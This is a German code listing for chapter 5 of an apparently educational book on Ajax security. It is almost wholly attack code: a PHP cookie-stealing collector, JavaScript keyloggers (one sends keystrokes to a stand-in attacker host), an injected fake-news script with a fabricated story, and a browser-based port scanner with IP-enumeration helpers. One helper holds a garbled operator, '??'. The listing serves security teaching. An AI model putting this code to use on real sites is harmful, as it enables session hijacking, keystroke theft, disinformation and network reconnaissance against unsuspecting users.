Ajax Security - Quelltexte Kapitel 5

5.1 Ausspähen von Cookies

cookie-sammler.php

<?
// Daten sammeln
$geklautercookie = $_GET["geklautercookie"];
$ip = getenv ("REMOTE_ADDR");
$referer = getenv("HTTP_REFERER");
$datum = date("j. F Y, H:i");

// Eintrag zusammenstellen
$daten = "Cookie: ".$geklautercookie." <br>";
$daten = $daten."IP: ".$ip." <br>";
$daten = $daten."Referer: ".$referer." <br>";
$daten = $daten."Datum und Zeit: ".$datum." <br>";
$daten = $daten." <hr> <br>";

// Eintrag in Datei schreiben
$datei = fopen("geklaut.html", "a+");
fwrite($datei, $daten);
fclose($datei);
?>

5.2 Ausspähen von Tastatureingaben

Keylogger

<script> 
var keylog = 'Tastendr&uuml;cke: '; 
document.onkeypress = function () {
   window.status = keylog += String.fromCharCode(window.event.keyCode);
} 
</script> 

Keylogger mit Ajax

<script>
var serviceURL = "http://www.angreifer.example/tasten-sammler.php"
var req = new XMLHttpRequest();
var keylog = '';
document.onkeypress = function () { 
   keylog += String.fromCharCode(window.event.keyCode);
   sendeDaten(keylog)
} 

function sendeDaten(daten) {
   req.open("POST", serviceURL + "?tasten=" + encodeURIComponent(daten.value), true);
   req.send(null);
}
</script>

5.4 Einschleusen falscher Informationen

sc.js

document.write('<p align=left>Mon, 28 August 2006');
document.write('<p align=center><b>George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment</b>');
document.write('<p>On Friday night, George Bush made an official announcement saying that Michael Antipov (http://michael.antipov.name), a 9 year old talented security specialist was to be the chairperson of the Information Security Department of the US. The debatable decision was approved by three-hour long discussion in the Senate. ');
document.write('<p>Michael Antipov was noticed by the FBI service for his outstanding skills in the sphere of Information Security. He proved his ability to preside the abovementioned department defending 34 governmental web sites from Lebanon terrorist attacks. ');
document.write('<p>Michael Antipov, sun of the top-secret US spy, was born in Russia. 2 years of age, together with his parents, he moved to the USA to start his carrier in the CIA kindergarten. He continued his studies in the educational institution sub controlled by the CIA (names being erased for purpose of the National Security). He obtained his MS degree being at the age of 7. Having reached the age of 8 he already had a PhD.');
document.write('<p>"From now on the citizens of the USA can feel safe for the National Information Security is in the young but good hands", said George Bush in his last speech.');

5.6 Portscan über JavaScript

Portscanner

PortScanner = {};
PortScanner.scanPort = function (callback, host, port, timeout) {
    var timeout = (timeout == null)?100:timeout;
    var img = new Image();
    img.onerror = function () {
        if (!img) return;
        img = undefined;
        callback(host, port, 'open');
    };
    img.onload = img.onerror;
    img.src = 'http://' + host + ':' + port;

    setTimeout(function () {
        if (!img) return;
        img = undefined;
        callback(host, port, 'closed');
    }, timeout);
};

Mehrere Ports scannen

PortScanner.scanHost = function (callback, host, ports, timeout)
{
    for (index = 0; index < ports.length; index++)
        PortScanner.scanPort(callback, host, ports[index], timeout);
};

IP-Adressen umwandeln

function erzeugeIPArray(ipString) 
{
   var stringArray = ipString.split('.');
      // String in Array mit Strings aufteilen
   var intArray = new Array();
      // Array f&uuml;r Integer-Werte bereitstellen
   var i;
   for(i =0; i < stringArray.length; i++) 
   {
      intArray[i] = parseInt(stringArray[i]);
         // String in Integer-Wert umwandeln
    }
    return intArray;
}

IP-Adressen erhöhen

function erhoeheIP(dieIP) 
{
   var i;
   var c;
   for(i = 3; i>=0; i--) 
   {
      if(dieIP[i] < 255 ?? i == 0) 
      {
         dieIP[i]++;
         return dieIP;
      } 
      else {
         // Der Wert im aktuellen Segment i kann nicht erh&ouml;ht werden,
         // da dass zu einem &Uuml;berlauf f&uuml;hren w&uuml;rde
         // Daher muss im Segment davor weitergemacht werden
         dieIP[i] = 0;
         dieIP[i-1]++;
      }
   }
}

Eigene IP-Adresse ermitteln

AttackAPI.dom.getInternalIP = function () {
  try {
    var sock = new java.net.Socket();

    sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
    sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));

    return sock.getLocalAddress().getHostAddress();     
    } catch (e) {}
    return '127.0.0.1';
};